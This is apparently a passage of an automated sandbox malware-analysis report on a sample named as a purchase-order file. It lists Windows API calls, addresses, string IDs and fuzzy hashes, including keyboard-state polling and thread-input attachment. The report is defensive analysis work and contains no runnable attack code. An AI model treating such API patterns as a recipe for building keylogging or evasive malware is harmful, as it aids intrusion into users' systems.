                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                • API String ID: 323675364-22481851
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 001D3C5C
                                • CoInitialize.OLE32(00000000), ref: 001D3C8A
                                • CoUninitialize.OLE32 ref: 001D3C94
                                • _wcslen.LIBCMT ref: 001D3D2D
                                • GetRunningObjectTable.OLE32(00000000,?), ref: 001D3DB1
                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 001D3ED5
                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 001D3F0E
                                • CoGetObject.OLE32(?,00000000,001EFB98,?), ref: 001D3F2D
                                • SetErrorMode.KERNEL32(00000000), ref: 001D3F40
                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D3FC4
                                • VariantClear.OLEAUT32(?), ref: 001D3FD8
                                Similarity
                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                • String ID:
                                • API String ID: 429561992-0
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 001C7AF3
                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001C7B8F
                                • SHGetDesktopFolder.SHELL32(?), ref: 001C7BA3
                                • CoCreateInstance.OLE32(001EFD08,00000000,00000001,00216E6C,?), ref: 001C7BEF
                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001C7C74
                                • CoTaskMemFree.OLE32(?,?), ref: 001C7CCC
                                • SHBrowseForFolderW.SHELL32(?), ref: 001C7D57
                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001C7D7A
                                • CoTaskMemFree.OLE32(00000000), ref: 001C7D81
                                • CoTaskMemFree.OLE32(00000000), ref: 001C7DD6
                                • CoUninitialize.OLE32 ref: 001C7DDC
                                Similarity
                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                • String ID:
                                • API String ID: 2762341140-0
                                APIs
                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 001E5504
                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001E5515
                                • CharNextW.USER32(00000158), ref: 001E5544
                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 001E5585
                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 001E559B
                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001E55AC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$CharNext
                                • String ID:
                                • API String ID: 1350042424-0
                                • Opcode ID: d8d359b3c944f9d770401aaac1613ac68531bd924f783580325ee42b7905436c
                                • Instruction ID: 32101e79f093324e8bbafb7bcab77169bfba30422f68549bffd7ee1ed6d92dd6
                                • Opcode Fuzzy Hash: d8d359b3c944f9d770401aaac1613ac68531bd924f783580325ee42b7905436c
                                • Instruction Fuzzy Hash: D1619034900A89EFDF108F96CC84DFE7BBAEF09728F144145F925AB291D7748A81DB61
                                APIs
                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 001AFAAF
                                • SafeArrayAllocData.OLEAUT32(?), ref: 001AFB08
                                • VariantInit.OLEAUT32(?), ref: 001AFB1A
                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 001AFB3A
                                • VariantCopy.OLEAUT32(?,?), ref: 001AFB8D
                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 001AFBA1
                                • VariantClear.OLEAUT32(?), ref: 001AFBB6
                                • SafeArrayDestroyData.OLEAUT32(?), ref: 001AFBC3
                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001AFBCC
                                • VariantClear.OLEAUT32(?), ref: 001AFBDE
                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001AFBE9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                • String ID:
                                • API String ID: 2706829360-0
                                • Opcode ID: 99fd3ee76717eb4a2f2eb8879ddc951686047fa752d5c48f2b3f37f4b27c3b3d
                                • Instruction ID: 4afe7de2c2263cb75fbb847ad64e3d4d71254cd5f565be7edb3790a241e0ad45
                                • Opcode Fuzzy Hash: 99fd3ee76717eb4a2f2eb8879ddc951686047fa752d5c48f2b3f37f4b27c3b3d
                                • Instruction Fuzzy Hash: D5414175A00219DFCB04DFA8DC94DEEBBB9FF59344F008069F955AB661C730A946CBA0
                                APIs
                                • GetKeyboardState.USER32(?), ref: 001B9CA1
                                • GetAsyncKeyState.USER32(000000A0), ref: 001B9D22
                                • GetKeyState.USER32(000000A0), ref: 001B9D3D
                                • GetAsyncKeyState.USER32(000000A1), ref: 001B9D57
                                • GetKeyState.USER32(000000A1), ref: 001B9D6C
                                • GetAsyncKeyState.USER32(00000011), ref: 001B9D84
                                • GetKeyState.USER32(00000011), ref: 001B9D96
                                • GetAsyncKeyState.USER32(00000012), ref: 001B9DAE
                                • GetKeyState.USER32(00000012), ref: 001B9DC0
                                • GetAsyncKeyState.USER32(0000005B), ref: 001B9DD8
                                • GetKeyState.USER32(0000005B), ref: 001B9DEA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: State$Async$Keyboard
                                • String ID:
                                • API String ID: 541375521-0
                                • Opcode ID: 91ea4c7d8fdc298655e952c339eae9cb3fcea6364138f5d996f8e2fb97abf660
                                • Instruction ID: a0037fca92a5cdf4cf5dc20a4c4ba3f63520da8c8e2f8bcc027352eb09982a7d
                                • Opcode Fuzzy Hash: 91ea4c7d8fdc298655e952c339eae9cb3fcea6364138f5d996f8e2fb97abf660
                                • Instruction Fuzzy Hash: 4741F8346047CA6DFF3197A1C8443F5BEB06F15344F44805ADBC65A6C2DBA4A9CACBA2
                                APIs
                                • WSAStartup.WSOCK32(00000101,?), ref: 001D05BC
                                • inet_addr.WSOCK32(?), ref: 001D061C
                                • gethostbyname.WSOCK32(?), ref: 001D0628
                                • IcmpCreateFile.IPHLPAPI ref: 001D0636
                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001D06C6
                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001D06E5
                                • IcmpCloseHandle.IPHLPAPI(?), ref: 001D07B9
                                • WSACleanup.WSOCK32 ref: 001D07BF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                • String ID: Ping
                                • API String ID: 1028309954-2246546115
                                • Opcode ID: efb1c5d1d7b8e2a21c8166785f9904c725c4be18785803f034b68c3b1c8834b7
                                • Instruction ID: 58194f9d0007fd674435a1c6157beaeea044071dd070097ae3f2063987b2d907
                                • Opcode Fuzzy Hash: efb1c5d1d7b8e2a21c8166785f9904c725c4be18785803f034b68c3b1c8834b7
                                • Instruction Fuzzy Hash: F3918D35604241DFD321CF15D888F1ABBE0AF48318F1585AAE8A98F7A2C730ED85CF91
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$BuffCharLower
                                • String ID: cdecl$none$stdcall$winapi
                                • API String ID: 707087890-567219261
                                • Opcode ID: 97e319cc1f4d1c63df0c3dc43182b8fd5bd714363d02bb423b07143cc3c0fd47
                                • Instruction ID: 5f0982ae894e8238029aeefaaa77e074638e24d98e989f3428fa7595c8818f0b
                                • Opcode Fuzzy Hash: 97e319cc1f4d1c63df0c3dc43182b8fd5bd714363d02bb423b07143cc3c0fd47
                                • Instruction Fuzzy Hash: 2F518F31A005169BCB14DFACC9519BEB7B6BF64724B21422AE926EB3C5DB31DD40CB90
                                APIs
                                • CoInitialize.OLE32 ref: 001D3774
                                • CoUninitialize.OLE32 ref: 001D377F
                                • CoCreateInstance.OLE32(?,00000000,00000017,001EFB78,?), ref: 001D37D9
                                • IIDFromString.OLE32(?,?), ref: 001D384C
                                • VariantInit.OLEAUT32(?), ref: 001D38E4
                                • VariantClear.OLEAUT32(?), ref: 001D3936
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                • API String ID: 636576611-1287834457
                                • Opcode ID: 9c83d2a611db53ae24541c2af9155f7269e934a0d7f53a395be7228d0851d08b
                                • Instruction ID: a01d85e0f76755317210e505bc02e54ef19713a25eea21aaa94ba7c70586d895
                                • Opcode Fuzzy Hash: 9c83d2a611db53ae24541c2af9155f7269e934a0d7f53a395be7228d0851d08b
                                • Instruction Fuzzy Hash: CA61BD71608701AFD311DF54D889FAAB7E4AF59710F00090AF9A59B391D770EE49CB93
                                APIs
                                  • Part of subcall function 00169BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00169BB2
                                  • Part of subcall function 0016912D: GetCursorPos.USER32(?), ref: 00169141
                                  • Part of subcall function 0016912D: ScreenToClient.USER32(00000000,?), ref: 0016915E
                                  • Part of subcall function 0016912D: GetAsyncKeyState.USER32(00000001), ref: 00169183
                                  • Part of subcall function 0016912D: GetAsyncKeyState.USER32(00000002), ref: 0016919D
                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 001E8B6B
                                • ImageList_EndDrag.COMCTL32 ref: 001E8B71
                                • ReleaseCapture.USER32 ref: 001E8B77
                                • SetWindowTextW.USER32(?,00000000), ref: 001E8C12
                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 001E8C25
                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 001E8CFF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#"
                                • API String ID: 1924731296-2850516425
                                • Opcode ID: 83fab252cec3328a2eb6d7080560761f50b1c2eeb09d2722d2188651829086d4
                                • Instruction ID: 3e0c6a8953a3e9a0e06c11d54fddd6730b40579ecf740f71b3d06bee87feed5c
                                • Opcode Fuzzy Hash: 83fab252cec3328a2eb6d7080560761f50b1c2eeb09d2722d2188651829086d4
                                • Instruction Fuzzy Hash: 2B51BA70104340AFD700DF54DC9AFAE77E4FB99714F000629F956AB2E1CB709959CBA2
                                APIs
                                • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 001C33CF
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 001C33F0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: LoadString$_wcslen
                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                • API String ID: 4099089115-3080491070
                                • Opcode ID: 9e2a646b00c170e75c039d1cd26743b0bacf6186f47f917fadbb146eaef6cf9a
                                • Instruction ID: 2f3be01a5cb4db2a74959dc6d7d2a698dab39e530f351fa7e56499b1aee0ab2f
                                • Opcode Fuzzy Hash: 9e2a646b00c170e75c039d1cd26743b0bacf6186f47f917fadbb146eaef6cf9a
                                • Instruction Fuzzy Hash: 2E517D32900209EADF14EBE0DD46EEEB3B9AF24341F104065F92576052EB316F99DB61
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$BuffCharUpper
                                • String ID: APPEND$EXISTS$KEYS$REMOVE
                                • API String ID: 1256254125-769500911
                                • Opcode ID: 5e61cc796b8e4d4dd46140f3a79dcc512ff5b9a6e0f3924c92c80154015e6503
                                • Instruction ID: 7d84508857b8142904e97931d9160cb344dc29acd4ebfb873b12cc164c0e5ad0
                                • Opcode Fuzzy Hash: 5e61cc796b8e4d4dd46140f3a79dcc512ff5b9a6e0f3924c92c80154015e6503
                                • Instruction Fuzzy Hash: 2141E532A080269BCB206F7DCCD05FEB7B5AFB0758B254229E425DB684E771CD82C790
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 001C53A0
                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 001C5416
                                • GetLastError.KERNEL32 ref: 001C5420
                                • SetErrorMode.KERNEL32(00000000,READY), ref: 001C54A7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Error$Mode$DiskFreeLastSpace
                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                • API String ID: 4194297153-14809454
                                • Opcode ID: 96bf70644df40201847325b98e59b23318903a3cf59f32ecd3435cd3864d6435
                                • Instruction ID: 09da3bc0d98dc47d871e7cf9f78152a67f4f57bbabdeb86ccc921b447bb7e0ee
                                • Opcode Fuzzy Hash: 96bf70644df40201847325b98e59b23318903a3cf59f32ecd3435cd3864d6435
                                • Instruction Fuzzy Hash: 84317035A00504DFC718DF68D884FA97BB5EB65305F148059E805CF292EB71EDC6CB91
                                APIs
                                • CreateMenu.USER32 ref: 001E3C79
                                • SetMenu.USER32(?,00000000), ref: 001E3C88
                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001E3D10
                                • IsMenu.USER32(?), ref: 001E3D24
                                • CreatePopupMenu.USER32 ref: 001E3D2E
                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001E3D5B
                                • DrawMenuBar.USER32 ref: 001E3D63
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                • String ID: 0$F
                                • API String ID: 161812096-3044882817
                                • Opcode ID: ae89c32054be88d12ee2ae11e2c5db99d982552d5f3ec11c8b875881c19e8e51
                                • Instruction ID: 18ae5f605ad9eac59235659bf2f7f5eaa3b9ef28176a4dc0ee9ee0b86a5e9bdb
                                • Opcode Fuzzy Hash: ae89c32054be88d12ee2ae11e2c5db99d982552d5f3ec11c8b875881c19e8e51
                                • Instruction Fuzzy Hash: 44417974A01649AFDB14CFA5EC88EAE7BB5FF49310F140029E916AB360D730AA11CF90
                                APIs
                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 001E3A9D
                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 001E3AA0
                                • GetWindowLongW.USER32(?,000000F0), ref: 001E3AC7
                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001E3AEA
                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001E3B62
                                • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 001E3BAC
                                • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 001E3BC7
                                • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 001E3BE2
                                • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 001E3BF6
                                • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 001E3C13
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$LongWindow
                                • String ID:
                                • API String ID: 312131281-0
                                • Opcode ID: a272117b10d27682ed1aae2a90248ca6001dff02e0c67bf8b3ea85c3cb7579b7
                                • Instruction ID: 04b3a16f3d4495431c7aa6e41ade9547e4e6684a0eed5e7b73af732561a361a7
                                • Opcode Fuzzy Hash: a272117b10d27682ed1aae2a90248ca6001dff02e0c67bf8b3ea85c3cb7579b7
                                • Instruction Fuzzy Hash: 22617D75900248AFDB20DFA8CC85EEE77F8EF09700F14419AFA15A72A1C770AE95DB50
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 001BB151
                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,001BA1E1,?,00000001), ref: 001BB165
                                • GetWindowThreadProcessId.USER32(00000000), ref: 001BB16C
                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001BA1E1,?,00000001), ref: 001BB17B
                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 001BB18D
                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,001BA1E1,?,00000001), ref: 001BB1A6
                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001BA1E1,?,00000001), ref: 001BB1B8
                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,001BA1E1,?,00000001), ref: 001BB1FD
                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,001BA1E1,?,00000001), ref: 001BB212
                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,001BA1E1,?,00000001), ref: 001BB21D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                • String ID:
                                • API String ID: 2156557900-0
                                • Opcode ID: 654c62a27570b78ee19c8b28fabfbcd65993d1b3a5e2c3037fdaaf554e8df0b6
                                • Instruction ID: 2d175b4aff59a45bd72852dfd78aa8648763b920c98e66da49e93ea10a1f8351
                                • Opcode Fuzzy Hash: 654c62a27570b78ee19c8b28fabfbcd65993d1b3a5e2c3037fdaaf554e8df0b6
                                • Instruction Fuzzy Hash: 85318D75604204BFDB20DFA5ECC8FAE7BA9BB55311F104005FA11DA690D7B8AE428FB0
                                APIs
                                • _free.LIBCMT ref: 00182C94
                                  • Part of subcall function 001829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000), ref: 001829DE
                                  • Part of subcall function 001829C8: GetLastError.KERNEL32(00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000,00000000), ref: 001829F0
                                • _free.LIBCMT ref: 00182CA0
                                • _free.LIBCMT ref: 00182CAB
                                • _free.LIBCMT ref: 00182CB6
                                • _free.LIBCMT ref: 00182CC1
                                • _free.LIBCMT ref: 00182CCC
                                • _free.LIBCMT ref: 00182CD7
                                • _free.LIBCMT ref: 00182CE2
                                • _free.LIBCMT ref: 00182CED
                                • _free.LIBCMT ref: 00182CFB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 95da1c031ee306122840be37cedad6da0b2b5c24fc6b2fc5828e86c81bcf99d8
                                • Instruction ID: 0c113e094b7362c6eeb317cd355b9f83e54567ea10f099f10c4a71faef98aed4
                                • Opcode Fuzzy Hash: 95da1c031ee306122840be37cedad6da0b2b5c24fc6b2fc5828e86c81bcf99d8
                                • Instruction Fuzzy Hash: 0E119076900118AFCB02FF94D982CDD3BA9FF15354F8245A5FA489B222DB35EB509F90
                                APIs
                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00151459
                                • OleUninitialize.OLE32(?,00000000), ref: 001514F8
                                • UnregisterHotKey.USER32(?), ref: 001516DD
                                • DestroyWindow.USER32(?), ref: 001924B9
                                • FreeLibrary.KERNEL32(?), ref: 0019251E
                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0019254B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
